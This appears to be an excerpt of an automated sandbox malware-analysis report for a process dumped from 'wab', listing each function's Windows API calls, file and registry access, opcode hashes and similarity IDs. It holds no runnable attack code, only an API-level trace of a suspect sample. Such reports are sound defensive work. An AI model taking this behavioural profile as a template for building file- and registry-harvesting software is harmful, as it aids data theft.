                                                                                                                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4232544981-0
                                                                                                                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                                                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdebc76135af2cf1023bafaa400a1a9023da77bb5c8c155a9927df4170703216
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
